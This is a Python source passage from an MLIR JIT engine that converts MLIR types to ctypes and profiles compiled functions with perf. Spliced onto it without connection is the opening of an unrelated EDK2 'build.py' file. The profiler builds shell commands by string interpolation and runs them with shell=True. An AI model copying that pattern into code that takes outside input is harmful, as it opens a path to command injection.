result = return_llvm_pointer_to_ctypes(mlir_type)
elif isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMVec"]):
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
else:
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
return result
def return_scalar_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
np_type, ctypes_type = convert_mlir_atomic_type(mlir_type)
def decoder(result) -> np_type:
if not np.can_cast(result, np_type):
raise TypeError(
f"Return value {result} expected to be castable to {np_type}."
)
return np_type(result)
return ctypes_type, decoder
def return_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
"""Returns a single ctypes type for a single given MLIR type as well as a decoder."""
# TODO handle all other child classes of mlir.astnodes.Type
# TODO consider inlining this if it only has 2 cases
if isinstance(mlir_type, mlir.astnodes.PrettyDialectType):
result = return_pretty_dialect_type_to_ctypes(mlir_type)
elif isinstance(mlir_type, mlir.astnodes.RankedTensorType):
result = return_tensor_to_ctypes(mlir_type)
elif any(
isinstance(mlir_type, llvm_type)
for llvm_type in _DIALECT_TYPES["llvm"].values()
):
result = return_llvm_type_to_ctypes(mlir_type)
else:
result = return_scalar_to_ctypes(mlir_type)
return result
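# Illustrative sketch (example values assumed): a plain i64 return type falls
# through to return_scalar_to_ctypes, yielding a 64-bit ctypes integer type plus
# a decoder for which decoder(42) returns np.int64(42).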
###########################
# MLIR Input Type Helpers #
###########################
LLVM_DIALECT_TYPE_STRING_TO_CTYPES_POINTER_TYPE: Dict[str, "_ctypes._CData"] = {
"i8": ctypes.POINTER(ctypes.c_int8),
# TODO extend this
}
def input_pretty_dialect_type_to_ctypes(
pretty_type: mlir.astnodes.PrettyDialectType,
) -> Tuple[list, Callable]:
# Special handling for !llvm.ptr<ptr<i8>>
if (
pretty_type.dialect == "llvm"
and pretty_type.type == "ptr"
and pretty_type.body[0].type == "ptr"
and pretty_type.body[0].body[0] == "i8"
):
# Convert to an LLVMPtr<LLVMPtr<i8>>
LLVMPtr = _DIALECT_TYPES["llvm"]["LLVMPtr"]
inner_obj = object.__new__(LLVMPtr)
inner_obj.type = mlir.astnodes.IntegerType(width=8)
outer_obj = object.__new__(LLVMPtr)
outer_obj.type = inner_obj
return input_llvm_pointer_to_ctypes(outer_obj)
# Pretty dialect types must be special-cased since they're arbitrarily structured.
raise NotImplementedError(f"Converting {pretty_type} to ctypes not yet supported.")
def input_tensor_to_ctypes(
tensor_type: mlir.astnodes.RankedTensorType,
) -> Tuple[list, Callable]:
if tensor_type.encoding is not None:
# We assume anything with an encoding must be a sparse tensor
# After lowering, this will become !llvm.ptr<i8>
ctypes_type = ctypes.POINTER(ctypes.c_int8)
input_c_types = [ctypes_type]
def encoder(arg: MLIRSparseTensor) -> List[ctypes_type]:
# protocol for indicating an object can be interpreted as a MLIRSparseTensor
if hasattr(arg, "__mlir_sparse__"):
arg = arg.__mlir_sparse__
if not isinstance(arg, MLIRSparseTensor):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {MLIRSparseTensor.__qualname__}"
)
return [ctypes.cast(arg.data, ctypes_type)]
else:
input_c_types = []
np_type, pointer_type = convert_mlir_atomic_type(
tensor_type.element_type, return_pointer_type=True
)
input_c_types.append(pointer_type) # allocated pointer (for free())
input_c_types.append(pointer_type) # base pointer
input_c_types.append(ctypes.c_int64) # offset from base
for _ in range(2 * len(tensor_type.dimensions)): # dim sizes and strides
input_c_types.append(ctypes.c_int64)
dimensions = [dim.value for dim in tensor_type.dimensions]
def encoder(arg: np.ndarray) -> list:
if not isinstance(arg, np.ndarray):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {np.ndarray.__qualname__}"
)
if not arg.dtype == np_type:
raise TypeError(f"{repr(arg)} is expected to have dtype {np_type}")
if not len(dimensions) == len(arg.shape):
raise ValueError(
f"{repr(arg)} is expected to have rank {len(dimensions)} but has rank {len(arg.shape)}."
)
encoded_args = [arg, arg, 0]
for dim_index, dim_size in enumerate(arg.shape):
expected_dim_size = dimensions[dim_index]
if (
expected_dim_size is not None
and arg.shape[dim_index] != expected_dim_size
):
raise ValueError(
f"{repr(arg)} is expected to have size {expected_dim_size} in the "
f"{dim_index}th dimension but has size {arg.shape[dim_index]}."
)
encoded_args.append(arg.shape[dim_index])
for dimension_index in range(len(arg.shape)):
stride = arg.strides[dimension_index] // arg.itemsize
encoded_args.append(stride)
return encoded_args
return input_c_types, encoder
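# Illustrative sketch (shapes assumed): a dense tensor<2x3xf64> argument given a
# C-contiguous np.ones((2, 3)) is encoded as
#   [arr, arr, 0, 2, 3, 3, 1]
# i.e. allocated pointer, base pointer, offset, sizes, then strides measured in
# elements rather than bytes.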
def input_llvm_pointer_to_ctypes(
mlir_type: _DIALECT_TYPES["llvm"]["LLVMPtr"],
) -> Tuple[list, Callable]:
if (
isinstance(mlir_type.type, mlir.astnodes.IntegerType)
and int(mlir_type.type.width) == 8
):
# We blindly assume that an i8 pointer points to a sparse tensor
# since MLIR's sparse tensor object isn't supported inside an LLVMPtr
# Instead, we pass a ptr<ptr<i8>> and blindly assume it means a list of sparse tensors
type_string = mlir_type.type.dump()
ctypes_type = LLVM_DIALECT_TYPE_STRING_TO_CTYPES_POINTER_TYPE[type_string]
ctypes_input_types = [ctypes_type]
def encoder(arg: MLIRSparseTensor) -> list:
# protocol for indicating an object can be interpreted as a MLIRSparseTensor
if hasattr(arg, "__mlir_sparse__"):
arg = arg.__mlir_sparse__
if not isinstance(arg, MLIRSparseTensor):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {MLIRSparseTensor.__qualname__}"
)
return [ctypes.cast(arg.data, ctypes_type)]
else:
# Treat the pointer as an array (intended to represent a Python sequence).
element_ctypes_input_types, element_encoder = input_type_to_ctypes(
mlir_type.type
)
# element_ctypes_input_types has exactly one element type since
# a pointer type can only point to one type
(element_ctypes_input_type,) = element_ctypes_input_types
ctypes_input_types = [ctypes.POINTER(element_ctypes_input_type)]
def encoder(arg: Union[list, tuple]) -> List[ctypes.Array]:
if not isinstance(arg, (list, tuple)):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {list} or {tuple}."
)
ArrayType = element_ctypes_input_type * len(arg)
encoded_elements = sum(map(element_encoder, arg), [])
array = ArrayType(*encoded_elements)
return [array]
return ctypes_input_types, encoder
def input_llvm_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
if isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMPtr"]):
result = input_llvm_pointer_to_ctypes(mlir_type)
elif isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMVec"]):
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
else:
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
return result
def input_scalar_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
np_type, ctypes_type = convert_mlir_atomic_type(mlir_type)
ctypes_input_types = [ctypes_type]
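# The encoder checks that the Python scalar can be safely cast to the MLIR
# element's numpy dtype before it is handed to ctypes.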
def encoder(arg) -> list:
try:
can_cast = np.can_cast(arg, np_type, "safe")
except TypeError:
can_cast = False
if not can_cast:
raise TypeError(f"{repr(arg)} cannot be cast to {np_type}")
if not isinstance(arg, (np.number, int, float)):
raise TypeError(
f"{repr(arg)} is expected to be a scalar with dtype {np_type}"
)
return [arg]
return ctypes_input_types, encoder
def input_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
# TODO handle all other child classes of mlir.astnodes.Type
# TODO consider inlining this if it only has 2 cases
if isinstance(mlir_type, mlir.astnodes.PrettyDialectType):
result = input_pretty_dialect_type_to_ctypes(mlir_type)
elif isinstance(mlir_type, mlir.astnodes.RankedTensorType):
result = input_tensor_to_ctypes(mlir_type)
elif any(
isinstance(mlir_type, llvm_type)
for llvm_type in _DIALECT_TYPES["llvm"].values()
):
result = input_llvm_type_to_ctypes(mlir_type)
else:
result = input_scalar_to_ctypes(mlir_type)
return result
def mlir_function_input_encoders(
mlir_function: mlir.astnodes.Function,
) -> Tuple[List[type], List[Callable]]:
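# Build the flattened ctypes signature plus one encoder per MLIR argument.
# Illustrative example (hypothetical signature, not from this module): for
# `func @f(%a: f64, %t: tensor<4xf32>)`, ctypes_input_types would be the scalar's
# ctype followed by the tensor's flattened descriptor fields (allocated pointer,
# base pointer, offset, size, stride), and each encoder returns a list whose
# elements are concatenated by the caller to form the final C argument list.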
ctypes_input_types = []
encoders: List[Callable] = []
for arg in mlir_function.args:
arg_ctypes_input_types, encoder = input_type_to_ctypes(arg.type)
ctypes_input_types += arg_ctypes_input_types
encoders.append(encoder)
return ctypes_input_types, encoders
####################
# PyMLIR Utilities #
####################
def _resolve_type_aliases(
node: Any,
type_alias_table: Dict[str, mlir.astnodes.PrettyDialectType],
) -> Any:
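# Recursively walk the AST node, replacing each TypeAlias reference with its
# definition from type_alias_table; fields are rewritten in place.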
if isinstance(node, (mlir.astnodes.Node, mlir.astnodes.Module)):
for field in node._fields_:
field_value = getattr(node, field)
field_type = type(field_value)
if field_type in (list, tuple):
resolved_field_value = field_type(
_resolve_type_aliases(sub_node, type_alias_table)
for sub_node in field_value
)
elif issubclass(field_type, mlir.astnodes.TypeAlias):
alias_name = field_value.value
alias_value = type_alias_table[alias_name]
resolved_field_value = _resolve_type_aliases(
alias_value, type_alias_table
)
else:
resolved_field_value = _resolve_type_aliases(
field_value, type_alias_table
)
setattr(node, field, resolved_field_value)
return node
def resolve_type_aliases(module: mlir.astnodes.Module) -> None:
"""Modifies module in place."""
# TODO this is currently only called by MlirJitEngine.add, which only uses the functions in the
# module, but we resolve all AST nodes, not just the functions. Consider whether or not it's necessary
# to resolve all AST nodes besides those of type mlir.astnodes.AttrAlias and mlir.astnodes.Function.
type_alias_table = {
alias.name.value: alias.value
for alias in module.body
if isinstance(alias, mlir.astnodes.TypeAliasDef)
}
if len(type_alias_table) > 0:
_resolve_type_aliases(module, type_alias_table)
return
def parse_mlir_functions(
mlir_text: Union[str, bytes], cli: MlirOptCli
) -> mlir.astnodes.Module:
if isinstance(mlir_text, str):
mlir_text = mlir_text.encode()
# Run text thru mlir-opt to apply aliases and flatten function signatures
mlir_text = cli.apply_passes(mlir_text, [])
# Remove everything except function signatures
func_lines = [
line.strip() for line in mlir_text.splitlines() if line.lstrip()[:5] == "func "
]
# Add in trailing "}" to make defined functions valid
func_lines = [line + "}" if line[-1] == "{" else line for line in func_lines]
mlir_ast = mlir.parse_string("\n".join(func_lines))
return mlir_ast
#################
# MlirJitEngine #
#################
class MlirJitEngine:
def __init__(self, cli_executable=None, cli_options=None, llvmlite_engine=None):
if llvmlite_engine is None:
# Create a target machine representing the host
target = llvm.Target.from_default_triple()
target_machine = target.create_target_machine()
# And an execution engine with an empty backing module
backing_mod = llvm.parse_assembly("")
llvmlite_engine = llvm.create_mcjit_compiler(backing_mod, target_machine)
self._engine = llvmlite_engine
self.default_profile_dir = tempfile.TemporaryDirectory()
self.current_profile_dir: Optional[str] = None
self.c_compiler = distutils.ccompiler.new_compiler()
self._cli = MlirOptCli(cli_executable, cli_options)
self.name_to_callable: Dict[str, Callable] = {}
return
@property
def profile_dir_name(self) -> str:
if self.current_profile_dir is not None:
# TODO consider making a context manager for setting self.current_profile_dir
return self.current_profile_dir
return self.default_profile_dir.name
def profiled_function(
self, main_callable: Callable, symbol_to_profile: str
) -> Callable:
"""Decorator to profile a function via Linux's perf tool."""
# set this at the time that decorated_func is created and
# not at the time it is called as the value of
# self.profile_dir_name may change.
perf_data_file_name = os.path.join(
self.profile_dir_name, f"perf-{uuid.uuid4()}.data"
)
def mp_func(queue: mp.SimpleQueue, *args):
# send pid to decorated_func
queue.put(os.getpid())
# wait for decorated_func to signal start of execution
start_signal = queue.get()
assert start_signal == "start"
# execute the function
result = main_callable(*args)
# return the result on the queue
queue.put(result)
return
def decorated_func(*args) -> Any:
# get pid from mp_func
q = mp.SimpleQueue()
execution_process = mp.Process(target=mp_func, args=(q, *args))
execution_process.start()
execution_process_id = q.get()
# start profiling
record_process = subprocess.Popen(
"/bin/bash",
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
)
record_command = f"""
perf record -g -p {execution_process_id} --output={perf_data_file_name}
exit
"""
record_process.stdin.write(record_command.encode())
record_process.stdin.flush()
# wait for profiling to initialize
for _ in range(3): # FIXME how do we truly know perf-record is ready?
record_process.stderr.readline()
# signal mp_func to start execution
q.put("start") # dummy value
# wait for execution to finish
result = q.get()
execution_process.join()
execution_process.close()
# wait for profiling to finish
while record_process.poll() is None:
pass
# gather profiling results
annotate_command = f"perf annotate --stdio --symbol {symbol_to_profile} -l --input={perf_data_file_name}"
annotate_process = subprocess.Popen(
annotate_command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) # combines stdout and stderr
stdout_string, _ = annotate_process.communicate()
stdout_string = stdout_string.decode()
# print results
profile_text = stdout_string.strip()
profile_text = "\n" + profile_text
profile_text = profile_text.replace("\n", "\n ")
profile_text = "Profile Results:" + profile_text
print(profile_text)
return result
return decorated_func
def _add_llvm_module(
self, mod: llvm.module.ModuleRef, profile: Union[bool, ctypes.CDLL]
) -> Optional[ctypes.CDLL]:
if profile:
o_file_bytes_list = []
self._engine.set_object_cache(
notify_func=lambda module, buffer: o_file_bytes_list.append(buffer)
)
self._engine.add_module(mod)
self._engine.finalize_object()
self._engine.run_static_constructors()
if profile:
files_to_link = [_SPARSE_UTILS_SO]
# On the first call (globally) to self._engine.add_module,
# the notify_func is called twice. The first time is on some
# buffer with no symbols and the second is on the buffer
# containing the .o code for mod. On all other calls,
# we have len(o_file_bytes_list) == 1.
# Thus, we use the last element of o_file_bytes_list.
assert len(o_file_bytes_list) in (1, 2)
o_file_bytes = o_file_bytes_list[-1]
o_file_name = f"mod-{uuid.uuid4()}.o"
o_file_name = os.path.join(self.profile_dir_name, o_file_name)
with open(o_file_name, "wb") as f:
f.write(o_file_bytes_list[-1])
files_to_link.append(o_file_name)
if isinstance(profile, ctypes.CDLL):
files_to_link.append(profile._name)
so_file_name = f"shared-{uuid.uuid4()}.so"
so_file_name = os.path.join(self.profile_dir_name, so_file_name)
self.c_compiler.link_shared_object(files_to_link, so_file_name, debug=True)
ctypes.cdll.LoadLibrary(so_file_name)
shared_lib = ctypes.CDLL(so_file_name)
self._engine.set_object_cache(notify_func=None)
else:
shared_lib = None
return shared_lib
def _add_mlir_module(
self,
mlir_text: bytes,
passes: List[str],
*,
debug: bool = False,
profile: Union[bool, ctypes.CDLL] = False,
) -> Optional[Union[DebugResult, ctypes.CDLL]]:
"""Translates MLIR code -> LLVM dialect of MLIR -> actual LLVM IR."""
if profile:
prof_filename = os.path.join(
self.profile_dir_name, f"prof-{uuid.uuid4()}.mlir"
)
with open(prof_filename, "wb") as f:
f.write(mlir_text)
mlir_text = prof_filename
if debug:
try:
llvm_dialect_text = self._cli.apply_passes(mlir_text, passes)
except MlirOptError as e:
return e.debug_result
else:
llvm_dialect_text = self._cli.apply_passes(mlir_text, passes)
mlir_translate_run = subprocess.run(
["mlir-translate", "--mlir-to-llvmir"],
input=llvm_dialect_text.encode(),
capture_output=True,
)
if mlir_translate_run.returncode != 0:
raise RuntimeError(
f"mlir-translate failed on the following input: \n{llvm_dialect_text}"
)
llvm_ir_text = mlir_translate_run.stdout.decode()
# Create a LLVM module object from the IR
mod = llvm.parse_assembly(llvm_ir_text)
mod.verify()
# Now add the module and make sure it is ready for execution
optional_shared_lib = self._add_llvm_module(mod, profile)
return optional_shared_lib
def _generate_zero_or_single_valued_functions(
self,
mlir_functions: Iterable[mlir.astnodes.Function],
shared_lib: Optional[ctypes.CDLL],
) -> Dict[str, Callable]:
"""Generates a Python callable from a function returning zero values or one value."""
name_to_callable: Dict[str, Callable] = {}
for mlir_function in mlir_functions:
name: str = mlir_function.name.value
mlir_types = mlir_function.result_types
if not isinstance(mlir_types, list):
ctypes_return_type, decoder = return_type_to_ctypes(mlir_types)
elif len(mlir_types) == 0:
ctypes_return_type = ctypes.c_char # arbitrary dummy type
decoder = lambda *args: None
else:
raise ValueError(
f"MLIR functions with multiple return values should be handled elsewhere."
)
ctypes_input_types, encoders = mlir_function_input_encoders(mlir_function)
if shared_lib is not None:
c_callable = getattr(shared_lib, name)
c_callable.argtypes = ctypes_input_types
c_callable.restype = ctypes_return_type
else:
function_pointer: int = self._engine.get_function_address(name)
if function_pointer == 0:
raise ValueError(
f"The address for the function {repr(name)} is the null pointer."
)
c_callable = ctypes.CFUNCTYPE(ctypes_return_type, *ctypes_input_types)(
function_pointer
)
def python_callable(mlir_function, encoders, c_callable, decoder, *args):
if len(args) != len(mlir_function.args):
raise ValueError(
f"{name} expected {len(mlir_function.args)} args but got {len(args)}."
)
encoded_args = (encoder(arg) for arg, encoder in zip(args, encoders))
encoded_args = sum(encoded_args, [])
encoded_result = c_callable(*encoded_args)
result = decoder(encoded_result)
return result
bound_func = partial(
python_callable, mlir_function, encoders, c_callable, decoder
)
if shared_lib is not None:
bound_func = self.profiled_function(bound_func, name)
name_to_callable[name] = bound_func
return name_to_callable
def _lower_types_to_strings(
self, ast_types: Iterable[mlir.astnodes.Type], passes: List[str]
) -> Dict[str, str]:
"""
Uses mlir-opt to lower types. This assumes that the passes will
lower to the LLVM dialect.
"""
# TODO this costs one mlir-opt subprocess ; can we avoid it?
# TODO must do string manipulation bc PyMLIR doesn't work with nested LLVM dialect
# types, e.g. !llvm.struct<(ptr<f32>, ptr<f32>, i64, array<2 x i64>, array<2 x i64>)
ast_type_strings = list({ast_type.dump() for ast_type in ast_types})
if len(ast_type_strings) == 0:
return {}
padding = int(np.ceil(np.log10(len(ast_types))))
dummy_declarations_string = "\n".join(
f"func private @func_{i:#0{padding}}() -> {ast_type_string}"
for i, ast_type_string in enumerate(ast_type_strings)
).encode()
lowered_text = self._cli.apply_passes(dummy_declarations_string, passes)
lowered_lines = list(filter(len, lowered_text.splitlines()))
assert lowered_lines[0] == 'module attributes {llvm.data_layout = ""} {'
assert lowered_lines[-1] == "}"
lowered_lines = lowered_lines[1:-1]
assert all(
line.endswith(' attributes {sym_visibility = "private"}')
for line in lowered_lines
)
assert all(line.startswith(" llvm.func @func_") for line in lowered_lines)
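# Each lowered line has the form
#   `llvm.func @func_<i>() -> <lowered type> attributes {sym_visibility = "private"}`
# so the slice below strips the `llvm.func @func_<i>() -> ` prefix
# (24 + padding characters, including indentation) and the 40-character
# `attributes {...}` suffix, leaving only the lowered type string.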
lowered_type_strings = [line[24 + padding : -40] for line in lowered_lines]
return dict(zip(ast_type_strings, lowered_type_strings))
def _generate_mlir_string_for_multivalued_functions(
self, mlir_functions: Iterable[mlir.astnodes.Function], passes: List[str]
) -> Tuple[str, List[str], List[str]]:
result_type_name_to_lowered_result_type_name = self._lower_types_to_strings(
sum((mlir_function.result_types for mlir_function in mlir_functions), []),
passes,
)
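# Each wrapper takes one extra pointer argument per result value: it calls the
# original function and llvm.store's each result through the corresponding
# pointer, so the wrapper itself returns nothing and is straightforward to
# invoke through ctypes.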
# Generate conglomerate MLIR string for all wrappers
mlir_wrapper_texts: List[str] = []
names = [mlir_function.name.value for mlir_function in mlir_functions]
wrapper_names = [name + "wrapper" for name in names]
for mlir_function, wrapper_name in zip(mlir_functions, wrapper_names):
lowered_result_type_names = [
result_type_name_to_lowered_result_type_name[result_type.dump()]
for result_type in mlir_function.result_types
]
joined_result_types = ", ".join(lowered_result_type_names)
joined_original_arg_signature = ", ".join(
arg.dump() for arg in mlir_function.args
)
declaration = f"func private @{mlir_function.name.value}({joined_original_arg_signature}) -> ({joined_result_types})"
new_var_names = (f"var{i}" for i in itertools.count())
arg_names: Set[str] = {arg.name.value for arg in mlir_function.args}
num_results = len(mlir_function.result_types)
lowered_result_arg_types = [
f"!llvm.ptr<{result_type_name}>"
for result_type_name in lowered_result_type_names
]
result_arg_names = (name for name in new_var_names if name not in arg_names)
result_arg_names = list(itertools.islice(result_arg_names, num_results))
wrapper_signature = ", ".join(
f"%{name}: {result_arg_type}"
for name, result_arg_type in zip(
result_arg_names, lowered_result_arg_types
)
)
if len(mlir_function.args) > 0:
wrapper_signature += ", " + joined_original_arg_signature
joined_arg_types = ", ".join(arg.type.dump() for arg in mlir_function.args)
joined_arg_names = ", ".join(arg.name.dump() for arg in mlir_function.args)
aggregate_result_var_name = next(new_var_names)
body_lines = itertools.chain(
[
f"%{aggregate_result_var_name}:{num_results} "
f"= call @{mlir_function.name.value}({joined_arg_names}) "
f": ({joined_arg_types}) -> ({joined_result_types})"
],
(
f"llvm.store %{aggregate_result_var_name}#{i}, %{result_arg_name} : {result_arg_type}"
for i, (result_arg_name, result_arg_type) in enumerate(
zip(result_arg_names, lowered_result_arg_types)
)
),
)
body = "\n ".join(body_lines)
mlir_wrapper_text = f"""
{declaration}
func @{wrapper_name}({wrapper_signature}) -> () {{
{body}
return
}}
"""
mlir_wrapper_texts.append(mlir_wrapper_text)
mlir_text = "\n".join(mlir_wrapper_texts)
return mlir_text, names, wrapper_names
def _generate_multivalued_functions(
self,
mlir_functions: Iterable[mlir.astnodes.Function],
passes: List[str],
internal_shared_lib: Optional[ctypes.CDLL],
) -> Dict[str, Callable]:
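# Compile the generated wrapper module and expose one Python callable per wrapped
# function; each callable allocates a ctypes value per result, passes pointers to
# the wrapper, then decodes the stored results and returns them as a tuple.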
name_to_callable: Dict[str, Callable] = {}
(
mlir_text,
names,
wrapper_names,
) = self._generate_mlir_string_for_multivalued_functions(mlir_functions, passes)
# this is guaranteed to not raise exceptions since the user-provided
# code was already added (failures would occur then)
wrapper_shared_lib = self._add_mlir_module(
mlir_text.encode(), passes, profile=internal_shared_lib
)
assert bool(wrapper_shared_lib) == bool(internal_shared_lib)
# Generate callables
for mlir_function, name, wrapper_name in zip(
mlir_functions, names, wrapper_names
):
ctypes_input_types, input_encoders = mlir_function_input_encoders(
mlir_function
)
ctypes_result_arg_pointer_types = []
ctypes_result_arg_types = []
decoders = []
for result_type in mlir_function.result_types:
result_type_ctypes_type, decoder = return_type_to_ctypes(result_type)
ctypes_result_arg_pointer_types.append(
ctypes.POINTER(result_type_ctypes_type)
)
ctypes_result_arg_types.append(result_type_ctypes_type)
decoders.append(decoder)
if wrapper_shared_lib is not None:
c_callable = getattr(wrapper_shared_lib, wrapper_name)
c_callable.argtypes = (
ctypes_result_arg_pointer_types + ctypes_input_types
)
c_callable.restype = None
else:
function_pointer: int = self._engine.get_function_address(wrapper_name)
if function_pointer == 0:
raise ValueError(
f"The address for the function {repr(wrapper_name)} is the null pointer."
)
c_callable = ctypes.CFUNCTYPE(
None, *ctypes_result_arg_pointer_types, *ctypes_input_types
)(function_pointer)
def python_callable(
mlir_function,
ctypes_result_arg_types,
input_encoders,
c_callable,
decoders,
*args,
) -> tuple:
if len(args) != len(mlir_function.args):
raise ValueError(
f"{mlir_function.name.value} expected {len(mlir_function.args)} "
f"args but got {len(args)}."
)
result_arg_values = [
result_arg_type() for result_arg_type in ctypes_result_arg_types
]
result_arg_pointers = [
ctypes.pointer(value) for value in result_arg_values
]
encoded_args = (
encoder(arg) for arg, encoder in zip(args, input_encoders)
)
encoded_args = itertools.chain(*encoded_args)
returned_result = c_callable(*result_arg_pointers, *encoded_args)
assert returned_result is None
return tuple(
decoder(result_arg_pointer.contents)
for decoder, result_arg_pointer in zip(
decoders, result_arg_pointers
)
)
bound_func = partial(
python_callable,
mlir_function,
ctypes_result_arg_types,
input_encoders,
c_callable,
decoders,
)
if wrapper_shared_lib is not None:
bound_func = self.profiled_function(bound_func, name)
name_to_callable[mlir_function.name.value] = bound_func
return name_to_callable
def _walk_module(self, mlir_ast):
"""Recursively walks an MLIR Module, yielding all non-Module objects"""
assert isinstance(
mlir_ast, mlir.astnodes.Module
), f"Cannot walk a {type(mlir_ast)}; expected a Module"
for item in mlir_ast.body:
if isinstance(item, mlir.astnodes.Module):
yield from self._walk_module(item)
else:
yield item
def add(
self,
mlir_text: Union[str, bytes],
passes: Tuple[str],
*,
debug: bool = False,
profile: bool = False,
profile_result_directory: Optional[str] = None,
) -> Union[List[str], DebugResult]:
"""List of new function names added."""
if profile_result_directory is not None:
if not profile:
raise ValueError(
"Cannot specify a profile result directory without also enabling profiling."
)
self.current_profile_dir = profile_result_directory
if profile:
if not sys.platform.startswith("linux"):
raise NotImplementedError("Profiling only supported on linux.")
elif shutil.which("perf") is None:
raise RuntimeError("Profiling requires perf to be installed.")
with open("/proc/sys/kernel/perf_event_paranoid", "r") as f:
perf_event_paranoid_setting = int(f.read().strip())
if perf_event_paranoid_setting != -1: # TODO is this too restrictive?
raise RuntimeError(
"Profiling not permitted since the contents of "
"/proc/sys/kernel/perf_event_paranoid must be -1."
)
if isinstance(mlir_text, str):
mlir_text = mlir_text.encode()
add_mlir_module_result = self._add_mlir_module(
mlir_text, passes, debug=debug, profile=profile
)
if isinstance(add_mlir_module_result, DebugResult):
return add_mlir_module_result
shared_lib = add_mlir_module_result
assert (not profile) == (shared_lib is None)
function_names: List[str] = []
mlir_ast = parse_mlir_functions(mlir_text, self._cli)
mlir_functions: List[mlir.astnodes.Function] = [
obj
for obj in self._walk_module(mlir_ast)
if isinstance(obj, mlir.astnodes.Function) and obj.visibility == "public"
]
# Separate zero/single return valued funcs from multivalued funcs
zero_or_single_valued_funcs = []
multivalued_funcs = []
for mlir_function in mlir_functions:
name: str = mlir_function.name.value
if name in self.name_to_callable:
raise ValueError(f"The function {repr(name)} is already defined.")
function_names.append(name)
if (
not isinstance(mlir_function.result_types, list)
or len(mlir_function.result_types) == 0
):
zero_or_single_valued_funcs.append(mlir_function)
else:
multivalued_funcs.append(mlir_function)
# Compile & add functions
name_to_zero_or_single_callable = (
self._generate_zero_or_single_valued_functions(
zero_or_single_valued_funcs, shared_lib
)
)
# TODO we currently need two separate compilations ; we can avoid this if
# we can use PyMLIR to simply add on the extra functions/wrappers we need
# to handle multivalued functions (we would just parse for an AST, add onto
# the AST, and then dump the AST). This is currently not possible since
# PyMLIR can't parse all MLIR. It'd also be difficult without an IR
# builder (which is currently a PyMLIR WIP).
name_to_multicallable = self._generate_multivalued_functions(
multivalued_funcs, passes, shared_lib
)
for name, python_callable in itertools.chain(
name_to_zero_or_single_callable.items(), name_to_multicallable.items()
):
# python_callable only tracks the function pointer, not the
# function itself. If self._engine gets garbage collected,
# we get a seg fault. Thus, we must keep the engine alive.
setattr(python_callable, "jit_engine", self)
self.name_to_callable[name] = python_callable
if profile_result_directory is not None:
self.current_profile_dir = None
return function_names
def __getitem__(self, func_name: str) -> Callable:
return self.name_to_callable[func_name]
def __getattr__(self, func_name: str) -> Callable:
return self[func_name]
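# Usage sketch (illustrative; the variable names, MLIR text, and pass list below
# are hypothetical, not defined in this module):
#   engine = MlirJitEngine()
#   names = engine.add(mlir_text, passes)  # list of public function names added
#   result = engine[names[0]](*args)       # or engine.<name>(*args) via __getattr__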
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
# Copyright (c) 2020, ARM Limited. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
import os.path as path
import sys
import os
import re
import glob
import time
import platform
import traceback
import multiprocessing
from threading import Thread,Event,BoundedSemaphore
import threading
from linecache import getlines
from subprocess import Popen,PIPE, STDOUT
from collections import OrderedDict, defaultdict
from edk2basetools.AutoGen.PlatformAutoGen import PlatformAutoGen
from edk2basetools.AutoGen.ModuleAutoGen import ModuleAutoGen
from edk2basetools.AutoGen.WorkspaceAutoGen import WorkspaceAutoGen
from edk2basetools.AutoGen.AutoGenWorker import AutoGenWorkerInProcess,AutoGenManager,\
LogAgent
from edk2basetools.AutoGen import GenMake
from edk2basetools.Common import Misc as Utils
from edk2basetools.Common.TargetTxtClassObject import TargetTxtDict
from edk2basetools.Common.ToolDefClassObject import ToolDefDict
from edk2basetools.build.buildoptions import MyOptionParser
from edk2basetools.Common.Misc import PathClass,SaveFileOnChange,RemoveDirectory
from edk2basetools.Common.StringUtils import NormPath
from edk2basetools.Common.MultipleWorkspace import MultipleWorkspace as mws
from edk2basetools.Common.BuildToolError import *
from edk2basetools.Common.DataType import *
import edk2basetools.Common.EdkLogger as EdkLogger
from edk2basetools.Workspace.WorkspaceDatabase import BuildDB
from edk2basetools.build.BuildReport import BuildReport
from edk2basetools.GenPatchPcdTable.GenPatchPcdTable import PeImageClass,parsePcdInfoFromMapFile
from edk2basetools.PatchPcdValue.PatchPcdValue import PatchBinaryFile
import edk2basetools.Common.GlobalData as GlobalData
from edk2basetools.GenFds.GenFds import GenFds, GenFdsApi
import multiprocessing as mp
from multiprocessing import Manager
from edk2basetools.AutoGen.DataPipe import MemoryDataPipe
from edk2basetools.AutoGen.ModuleAutoGenHelper import WorkSpaceInfo, PlatformInfo
from edk2basetools.GenFds.FdfParser import FdfParser
from edk2basetools.AutoGen.IncludesAutoGen import IncludesAutoGen
from edk2basetools.GenFds.GenFds import resetFdsGlobalVariable
from edk2basetools.AutoGen.AutoGen import CalculatePriorityValue
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
